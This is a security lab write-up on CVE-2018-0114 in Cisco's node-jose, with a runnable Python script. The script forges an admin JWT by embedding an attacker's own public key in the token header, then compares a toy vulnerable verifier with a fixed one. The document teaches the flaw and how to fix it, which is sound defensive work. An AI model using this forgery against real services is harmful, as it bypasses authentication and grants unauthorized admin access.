CVE-2018-0114
This exercise details the exploitation of a vulnerability in Cisco's node-jose, a JavaScript implementation of the JOSE standards (JWS, JWE, JWK) that is commonly used to create and verify JWTs.
This lab focuses on exploiting CVE-2018-0114, a vulnerability in Cisco's node-jose library. The JWS specification allows a token's header to carry a public key in the "jwk" parameter; vulnerable versions of node-jose used that embedded key to check the signature instead of a key configured by the application. Because the verifier trusts a key chosen by the very party that produced the token, an attacker can generate their own RSA key pair, place the public half in the header, sign the token with the matching private key, and have the application accept the forged signature, bypassing authentication entirely. You'll begin by generating an RSA key pair, then craft a JWT header that embeds the public key as a JWK. Finally, you'll use Python and OpenSSL to sign the token and trick the application into granting admin access.
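The following is an added worked example, not the lab's own exploit code and not node-jose's code. It carries the procedure above through in pure standard-library Python (3.8 or later, for pow(e, -1, phi)): generate an attacker RSA key pair, build a header whose "jwk" parameter carries the public half, sign the token RS256 (PKCS#1 v1.5 with SHA-256) with the private half, and present it to two toy verifiers. vulnerable_verify models the CVE-2018-0114 behaviour (a key in the header overrides the server's configured key); fixed_verify ignores the header and only uses the configured key. The RSA key generation and PKCS#1 v1.5 routines stand in for the lab's OpenSSL step so the script runs offline; they are demonstration quality, and the claim names ("user", "admin") and the 2048-bit default are assumptions.

```python
"""Forge a JWT that a verifier trusting the header's embedded key will accept (CVE-2018-0114 pattern)."""
import base64
import hashlib
import hmac
import json
import math
import secrets

# DER-encoded DigestInfo prefix for SHA-256 (RFC 8017, section 9.2, note 1).
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")
SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def b64url_json(obj) -> str:
    # Compact JSON, as JWT producers emit it.
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def int_to_bytes(value: int) -> bytes:
    return value.to_bytes((value.bit_length() + 7) // 8 or 1, "big")


def is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Trial division by small primes, then Miller-Rabin with random bases."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits: int) -> int:
    while True:
        candidate = secrets.randbits(bits) | (1 << (bits - 1)) | 1  # exact size, odd
        if is_probable_prime(candidate):
            return candidate


def gen_rsa_keypair(bits: int = 2048) -> tuple:
    """Return (n, e, d). Demonstration-quality key generation; real tooling uses OpenSSL or a vetted library."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        n, phi = p * q, (p - 1) * (q - 1)
        if p != q and n.bit_length() == bits and math.gcd(e, phi) == 1:
            return n, e, pow(e, -1, phi)


def pkcs1_v15_encode(digest: bytes, k: int) -> bytes:
    """EMSA-PKCS1-v1_5: 00 01 FF..FF 00 || DigestInfo, padded to the modulus length k."""
    t = SHA256_DIGESTINFO + digest
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def rs256_sign(signing_input: bytes, n: int, d: int) -> bytes:
    k = (n.bit_length() + 7) // 8
    em = pkcs1_v15_encode(hashlib.sha256(signing_input).digest(), k)
    return pow(int.from_bytes(em, "big"), d, n).to_bytes(k, "big")


def rs256_verify(signing_input: bytes, signature: bytes, n: int, e: int) -> bool:
    k = (n.bit_length() + 7) // 8
    s = int.from_bytes(signature, "big")
    if len(signature) != k or s >= n:
        return False
    em = pow(s, e, n).to_bytes(k, "big")
    return hmac.compare_digest(em, pkcs1_v15_encode(hashlib.sha256(signing_input).digest(), k))


def jwk_to_key(jwk: dict) -> tuple:
    """RSA JWK -> (n, e); the attacker controls these values when the jwk sits in the header."""
    return int.from_bytes(b64url_decode(jwk["n"]), "big"), int.from_bytes(b64url_decode(jwk["e"]), "big")


def sign_token(claims: dict, key: tuple, embed_jwk: bool) -> str:
    """Build and sign a JWT; with embed_jwk=True the signer's public key rides in the header."""
    n, e, d = key
    header = {"alg": "RS256", "typ": "JWT"}
    if embed_jwk:
        header["jwk"] = {"kty": "RSA", "e": b64url(int_to_bytes(e)), "n": b64url(int_to_bytes(n))}
    signing_input = f"{b64url_json(header)}.{b64url_json(claims)}"
    return f"{signing_input}.{b64url(rs256_sign(signing_input.encode(), n, d))}"


def forge_admin_token(attacker_key: tuple) -> str:
    """The attack: sign admin claims with our own key and advertise its public half in the header."""
    return sign_token({"user": "admin", "admin": True}, attacker_key, embed_jwk=True)


def _verify(token: str, select_key):
    """Shared verifier core; select_key(header) decides which public key is trusted. Returns claims or None."""
    try:
        h, p, s = token.split(".")
        header = json.loads(b64url_decode(h))
        n, e = select_key(header)
        if header.get("alg") != "RS256" or not rs256_verify(f"{h}.{p}".encode(), b64url_decode(s), n, e):
            return None
        return json.loads(b64url_decode(p))
    except (ValueError, KeyError, TypeError):
        return None


def vulnerable_verify(token: str, server_key: tuple):
    """Models the CVE-2018-0114 behaviour: a jwk in the header takes precedence over the configured key."""
    return _verify(token, lambda hdr: jwk_to_key(hdr["jwk"]) if "jwk" in hdr else server_key[:2])


def fixed_verify(token: str, server_key: tuple):
    """Hardened: nothing in the untrusted header may choose the verification key."""
    return _verify(token, lambda hdr: server_key[:2])


if __name__ == "__main__":
    server_key, attacker_key = gen_rsa_keypair(), gen_rsa_keypair()
    token = forge_admin_token(attacker_key)
    print("forged token:", token)
    print("vulnerable verifier returns:", vulnerable_verify(token, server_key))
    print("fixed verifier returns:", fixed_verify(token, server_key))
```

The vulnerable verifier still performs a real RSA signature check, which is why tampering with the payload after signing is rejected; what it gets wrong is letting the token's author nominate the key that check uses. The fix is the same in any language or library: the verification key comes from configuration (or a key ID looked up in a server-side key set), never from the token itself.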
Beyond the exploit itself, the exercise is an in-depth look at how JWTs are signed and verified, and at the pitfall of trusting a key supplied by the party whose token you are checking. By understanding the vulnerability and crafting a working exploit, you'll gain practical insight into securing JWT implementations and into spotting the same weakness in existing systems: a signature is only as trustworthy as the key used to verify it, and a signed token proves nothing if the verifying library lets the sender choose that key.